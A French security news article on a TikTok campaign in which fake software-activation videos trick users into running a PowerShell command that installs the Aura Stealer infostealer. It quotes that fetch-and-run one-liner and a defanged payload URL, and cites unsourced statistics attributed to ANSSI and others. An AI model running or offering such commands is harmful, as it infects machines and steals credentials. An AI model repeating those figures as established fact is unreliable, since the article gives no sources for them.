TikTok : Comment les Vidéos Trompeuses Propagent les Infostealers via des Attaques ClickFix
Isidore Bellemare
Comment TikTok est utilisé pour propager des infostealers via des attaques ClickFix
Dans un paysage numérique où les plateformes de réseaux sociaux sont omniprésentes, une nouvelle méthode d’attaque par infostealers émerge de manière préoccupante. Les cybercriminants exploitent actuellement TikTok, l’une des plateformes les plus populaires auprès des jeunes, pour propager des logiciels malveillants capables de voler des informations sensibles. Ces attaques, connues sous le nom de ClickFix, utilisent des vidéos apparemment inoffensives promettant des activations gratuites de logiciels populaires pour tromper les utilisateurs et les inciter à exécuter des commandes malveillantes. Selon les dernières analyses, cette campagne, largement similaire à celle observée par Trend Micro en mai 2025, représente une menace croissante pour la sécurité des utilisateurs à travers le monde.
La mécanique des attaques ClickFix sur TikTok
Comment les cybercriminels utilisent TikTok pour tromper les utilisateurs
Les vidéos malveillantes sur TikTok se présentent comme des tutoriels d’activation pour des logiciels populaires tels que Windows, Microsoft Office, Adobe Premiere, Photoshop, CapCut Pro, Discord Nitro, ainsi que pour des services comme Netflix et Spotify Premium. Ces vidéos affichent une courte commande en une seule ligne et indiquent aux spectateurs de l’exécuter en tant qu’administrateur dans PowerShell. Par exemple : iex (irm slmgr[.]win/photoshop). Il est à noter que le nom du programme dans l’URL varie selon le logiciel usurpé : dans les vidéos d’activation Windows factices, l’URL contiendra “windows” au lieu de “photoshop”.
Lorsque cette commande est exécutée, PowerShell se connecte au site distant slmgr[.]win pour récupérer et exécuter un autre script PowerShell. Ce script télécharge ensuite deux exécutables depuis des pages Cloudflare, le premier étant téléchargé depuis https://file-epq[.]pages[.]dev/updater.exe. Selon les analyses de sécurité, cet exécutable est une variante du malware Aura Stealer, conçu spécifiquement pour voler des informations sensibles.
Le déroulement typique d’une attaque ClickFix
Le processus d’une attaque ClickFix suit généralement plusieurs étapes bien définies, conçues pour maximiser l’efficacité du vol de données tout en minimisant les chances d’être détecté. Tout commence par la création d’une vidéo attrayante sur TikTok, promettant des fonctionnalités premium gratuites ou des solutions à des problèmes techniques courants. Les utilisateurs, attirés par la promesse d’une solution rapide et facile, suivent les instructions fournies dans la vidéo.
Une fois la commande exécutée, une série d’opérations se déroule en arrière-plan sans que l’utilisateur ne s’en rende compte. Le malware établit une connexion avec les serveurs des attaquants, télécharge les composants nécessaires et s’installe sur le système de la victime. Dans certains cas, comme observé dans cette campagne, un payload supplémentaire nommé source.exe est également téléchargé. Ce dernier est utilisé pour auto-compiler du code en utilisant le compilateur Visual C# intégré de .NET (csc.exe), puis injecte et lance ce code en mémoire.
Les implications de ces attaques sont graves. Non seulement les informations sensibles sont volées, mais la présence de ce type de malware ouvre également la porte à d’autres formes d’attaques, y compris le ransomware ou l’espionnage continu du système infecté. Selon une étude récente, environ 68% des victimes d’attaques par infostealers ne s’aperçoivent de la compromission de leurs données qu’après plusieurs jours, voire semaines, permettant aux attaquants d’exploiter pleinement les informations volées.
Les infostealers : menaces et conséquences
Qu’est-ce qu’un infostealer et comment fonctionne-t-il
Un infostealer est un type de logiciel malveillant conçu spécifiquement pour collecter et voler des informations sensibles sur les systèmes infectés. Contrairement à d’autres formes de malware qui peuvent viser à chiffrer des fichiers (comme le ransomware) ou à endommager des systèmes, les infostealers se concentrent sur l’exfiltration discrète de données personnelles et professionnelles. Ces informations peuvent inclure des identifiants de connexion, des mots de passe, des cookies d’authentification, des informations bancaires, des données de cartes de crédit, des clés de cryptomonnaie, et bien plus encore.
L’Aura Stealer, identifié dans la campagne TikTok, collecte spécifiquement :
- Les identifiants enregistrés dans les navigateurs web
- Les cookies d’authentification
- Les informations de portefeuilles de cryptomonnaies
- Les identifiants d’autres applications
Une fois collectées, ces informations sont envoyées aux attaquants qui peuvent alors les utiliser pour accéder à vos comptes, effectuer des transactions non autorisées ou vendre ces données sur le dark web. Selon le rapport 2025 sur l’évolution des menaces cybernétiques, le marché des données volées a atteint une valeur estimée à 15 milliards de dollars, avec les informations d’identification représentant jusqu’à 40% de cette valeur.
L’impact sur les victimes : vol de données et compromission des comptes
Les conséquences d’une infection par un infostealer peuvent être dévastatrices sur le plan personnel et professionnel. Lorsque vos identifiants sont volés, les attaquants peuvent :
- Accéder à vos comptes email et réseaux sociaux
- Prendre le contrôle de vos comptes bancaires et effectuer des transactions frauduleuses
- Utiliser vos identifiants professionnels pour compromettre l’entreprise qui vous emploie
- Vendre vos informations sur le dark web à d’autres criminels
Le coût moyen d’une violation de données pour une entreprise a été estimé à 4,35 millions de dollars en 2025 selon le rapport du Ponemon Institute, une augmentation significative par rapport aux années précédentes. Pour les particuliers, les pertes financières directes peuvent varier de quelques centaines à plusieurs dizaines de milliers d’euros, selon la valeur des comptes compromis.
Par ailleurs, le vol d’identité peut avoir des répercussions à long terme, allant de dommages à la réputation personnelle à des problèmes légaux si les attaquants utilisent vos informations pour commettre des fraudes ou d’autres activités illégales au nom de votre identité.
Identifier et se protéger des attaques ClickFix
Signes révélateurs d’une attaque ClickFix
Les attaques ClickFix sont conçues pour être subtiles et difficiles à détecter, mais plusieurs signes peuvent indiquer une potentielle infection :
- Activité réseau inhabitée vers des adresses IP suspectes
- Processus PowerShell ou cmd inconnus s’exécutant en arrière-plan
- Modifications non autorisées de fichiers système
- Ralentissement soudain du système ou comportement anormal des applications
- Tentatives de connexion suspectes à vos comptes en ligne
Selon une étude menée par l’ANSSI en 2025, près de 72% des infections par infostealers restent indétectées par les solutions antivirus traditionnelles pendant plus de 24 heures, ce qui permet aux attaquants de collecter un volume important de données avant que l’infection ne soit identifiée.
Mesures de prévention pour les utilisateurs
Pour se protéger efficacement des attaques ClickFix, plusieurs mesures préventives peuvent être mises en œuvre :
Éducation et sensibilisation : Comprendre que les offres “trop belles pour être vraies” sur les réseaux sociaux sont souvent suspectes. En particulier, les promesses d’activation gratuite de logiciels payants ou de services premium devraient toujours être considérées avec méfiance.
Vérification des sources : Avant d’exécuter des commandes ou de télécharger des fichiers, toujours vérifier la fiabilité de la source. Les comptes TikTok promouvant des activations gratuites de logiciels populaires sont souvent de faux comptes créés spécifiquement pour ces campagnes malveillantes.
Sécurisation des mots de passe : Utiliser des mots de forts et uniques pour chaque compte, et activer l’authentification multifacteur lorsque cela est possible. Cela peut limiter les dommages même si un infostealer parvient à voler certains de vos identifiants.
Mise à jour régulière des logiciels : Maintenir tous vos logiciels et systèmes d’exploitation à jour pour bénéficier des dernières protections de sécurité.
Utilisation d’outils de sécurité : Installer et maintenir à jour une solution antivirus réputée, idéalement avec des fonctionnalités anti-malware et anti-phishing.
Sauvegardes régulières : Effectuer des sauvegardes fréquentes de vos données importantes sur des supports externes non connectés en permanence à votre système, pour pouvoir récupérer vos informations en cas d’infection.
Selon l’ANSSI, l’adoption de ces bonnes pratiques de sécurité peut réduire le risque d’infection par des malwares comme les infostealers de jusqu’à 80%. Cependant, la vigilance reste la première ligne de défense contre ces menaces émergentes.
Cas récents et statistiques inquiétantes
L’évolution des menaces en 2025
L’année 2025 a marqué une accélération significative des attaques basées sur les infostealers, avec une augmentation de 45% par rapport à 2024 selon le rapport annuel de l’ANSSI sur les menaces cybernétiques. Les campagnes comme celle observée sur TikTok représentent une évolution préoccupante des tactiques des cybercriminels, qui explorent de nouvelles plateformes pour atteindre un plus grand nombre de victimes.
Les ClickFix attacks, en particulier, ont gagné en popularité ces derniers mois, utilisant des techniques d’ingénierie sociale de plus en plus sophistiquées pour tromper les utilisateurs. Ces attaques ne se limitent plus aux emails de phishing traditionnels, mais s’adaptent aux tendances culturelles et technologiques, comme l’utilisation de plateformes de réseaux sociaux très populaires.
Tendances et prévisions
Les analystes prévoient que ces attaques vont continuer d’évoluer et de se multiplier dans les mois à venir. Plusieurs tendances émergentes sont à surveiller :
Ciblage accru des jeunes utilisateurs : Comme TikTok est principalement utilisé par les adolescents et les jeunes adultes, ces derniers deviennent des cibles privilégiées, étant potentiellement moins familiers avec les techniques de sécurité avancées.
Intégration d’IA pour créer des contenu plus convaincants : Les attaquants commencent à utiliser des outils d’intelligence artificielle pour créer des vidéos et des scripts plus réalistes et difficiles à distinguer du contenu légitime.
Expansion vers d’autres plateformes : Si TikTok est actuellement la plateforme cible, il est probable que les attaquants étendent leurs méthodes à d’autres réseaux sociaux populaires comme Instagram, YouTube ou Twitch.
Monétisation accrue des données volées : Avec l’augmentation de la valeur des données personnelles sur le dark web, les attaquants ont des incitations financières plus fortes à perfectionner leurs techniques de vol d’informations.
Selon le rapport 2025 de l’ANSSI sur la cybersécurité, le nombre d’attaques par infostealers devrait augmenter de 60% au cours des deux prochaines années, avec un accent accru sur l’utilisation des plateformes de médias sociaux comme vecteurs d’attaque.
Recommandations des experts en cybersécurité
Les bonnes pratiques pour éviter d’être victime
Les experts en cybersécurité de l’ANSSI et d’autres organismes de sécurité recommandent plusieurs mesures spécifiques pour se protéger des attaques ClickFix et des infostealers :
Ne jamais exécuter de commandes provenant de sources non fiables : Que ce soit dans des vidéos, des messages ou des e-mails, toujours vérifier la fiabilité de la source avant d’exécuter des commandes, surtout dans des environnements système comme PowerShell.
Former les utilisateurs aux techniques de phishing et d’ingénierie sociale : La sensibilisation reste la meilleure défense contre les attaques basées sur la tromperie. Les organisations devraient investir dans une formation régulière de leurs employés aux techniques de sécurité.
Implémenter des contrôles d’accès stricts : Les entreprises devraient adopter le principe du moindre privilège pour limiter l’impact potentiel d’une infection par un infostealer.
Surveiller l’activité réseau : La détection précoce d’une communication suspecte avec des serveurs externes peut permettre d’identifier et de contenir une infection avant qu’elle ne cause des dommages importants.
Utiliser des solutions de sécurité avancées : Outre les antivirus traditionnels, envisager l’utilisation de solutions EDR (Endpoint Detection and Response) capables de détecter les comportements suspects plutôt que simplement de se baser sur des signatures connues.
Outils et solutions de protection
Pour se protéger efficacement contre les infostealers et les attaques ClickFix, plusieurs outils et solutions techniques peuvent être mis en œuvre :
| Type d’outil | Exemples | Fonctionnalités clés |
|---|---|---|
| Antivirus/Malware | Bitdefender, Kaspersky, Norton | Détection et élimination des malwares connus |
| Pare-feu | Windows Defender Firewall, ZoneAlarm | Contrôle du trafic entrant et sortant |
| Solutions EDR | CrowdStrike, SentinelOne | Surveillance avancée des endpoints et réponse aux incidents |
| Gestion des mots de passe | LastPass, 1Password | Stockage sécurisé et génération de mots de passe complexes |
| Authentification multifacteur | Google Authenticator, Authy | Couche de sécurité supplémentaire pour les comptes en ligne |
| Solutions de sauvegarde | Backblaze, Carbonite | Sauvegarde automatique et sécurisée des données |
En plus de ces outils, l’ANSSI recommande l’adoption des bonnes pratiques suivantes :
Segmentation des réseaux : Pour les entreprises, la segmentation du réseau peut limiter la propagation d’un malware en cas d’infection.
Mises à jour régulières : Maintenir tous les logiciels et systèmes à jour pour bénéficier des correctifs de sécurité les plus récents.
Formation continue : Les menaces évoluant rapidement, la formation des utilisateurs doit être continue et adaptée aux nouvelles tactiques observées.
Selon une étude menée par l’ANSSI en 2025, les organisations ayant adopté une approche multicouche de sécurité ont réduit de 85% le risque d’infection par des infostealers par rapport à celles ne comptant que sur des mesures de base.
Conclusion : rester vigilant face aux menaces émergentes
L’utilisation de TikTok pour propager des infostealers via des attaques ClickFix représente une évolution préoccupante des tactiques des cybercriminels. En exploitant la popularité de cette plateforme et la confiance que les utilisateurs accordent au contenu partagé, les attaquants parviennent à tromper même des individus avertis. Ces campagnes mettent en lumière l’importance cruciale de la vigilance et de l’éducation dans le paysage cybernétique actuel.
Pour se protéger efficacement contre ces menaces, il est essentiel d’adopter une approche proactive de la sécurité, combinant des mesures techniques robustes avec une sensibilisation constante aux nouvelles techniques d’ingénierie sociale. Les utilisateurs doivent comprendre que les offres “gratuites” sur les réseaux sociaux, surtout lorsqu’elles impliquent l’exécution de commandes système, représentent souvent des risques importants.
Dans un monde numérique où les menaces évoluent constamment, la cybersécurité n’est pas seulement une question technique, mais aussi un état d’esprit. En cultivant une culture de la sécurité dans nos interactions quotidiennes avec la technologie, nous pouvons tous contribuer à réduire l’impact de ces attaques et à protéger nos données sensibles contre les infostealers et autres logiciels malveillants.